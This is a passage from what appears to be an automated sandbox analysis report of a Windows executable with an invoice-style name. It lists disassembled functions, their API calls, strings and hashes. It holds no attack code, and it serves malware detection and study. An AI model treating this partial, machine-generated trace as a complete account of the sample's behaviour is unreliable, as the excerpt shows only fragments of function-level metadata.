                                            • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                          • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                          • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                          • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                          Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                          • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                          • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                          • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                          Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 00464F7A
                                            • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3
                                          • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                          • SetActiveWindow.USER32 ref: 0046500B
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                          • Sleep.KERNEL32(000000FA), ref: 00465043
                                          • IsWindow.USER32 ref: 0046504F
                                          • EndDialog.USER32(00000000), ref: 00465060
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                          • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                          • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                          • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                          Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                          • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                          • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                          • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                          • _memset.LIBCMT ref: 0046D7E1
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                          • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                          • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                                          • Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                          • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                                          Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                          • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                          • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                          • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                          • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                          • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                          • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                          • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                          • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                          • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                          Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                          • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                          • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                          • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                          • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                          Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                          • GetSysColor.USER32(0000000F), ref: 004021D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                          • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                          • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                          • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                          Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                          • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                          • _wcscpy.LIBCMT ref: 0046A9FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                                          • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                          • Opcode Fuzzy Hash: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                                          • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                          Function 00409837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 74ab7d9cbc612685900ff787a069c33943a43cf95dcfe0a9aabba57fa72e4a3b
                                          • Instruction ID: 743c89ec1be8f3b6cfe40c528e2526a533573b02274d3a1687b28713588ebf87
                                          • Opcode Fuzzy Hash: 74ab7d9cbc612685900ff787a069c33943a43cf95dcfe0a9aabba57fa72e4a3b
                                          • Instruction Fuzzy Hash: AB41D772A10205AFDB24EF35D841A7673E8EF09304F20487FE549E6393EA3D9D068B19
                                          Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0048716A
                                          • CreateMenu.USER32 ref: 00487185
                                          • SetMenu.USER32(?,00000000), ref: 00487194
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                          • IsMenu.USER32(?), ref: 00487237
                                          • CreatePopupMenu.USER32 ref: 00487241
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                          • DrawMenuBar.USER32 ref: 00487276
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                          • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                          • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                          • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                          Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                          • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                          • DeleteDC.GDI32(00000000), ref: 00487594
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                          • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                          • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                          • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                          Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00426E3E
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          • __gmtime64_s.LIBCMT ref: 00426ED7
                                          • __gmtime64_s.LIBCMT ref: 00426F0D
                                          • __gmtime64_s.LIBCMT ref: 00426F2A
                                          • __allrem.LIBCMT ref: 00426F80
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                          • __allrem.LIBCMT ref: 00426FB3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                          • __allrem.LIBCMT ref: 00426FE8
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                          • __invoke_watson.LIBCMT ref: 00427077
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                          Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00462542
                                          • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                          • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                          • Sleep.KERNEL32(000001F4), ref: 004625EB
                                          • GetMenuItemCount.USER32(?), ref: 0046262F
                                          • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                          • GetMenuItemID.USER32(?,?), ref: 004626BA
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
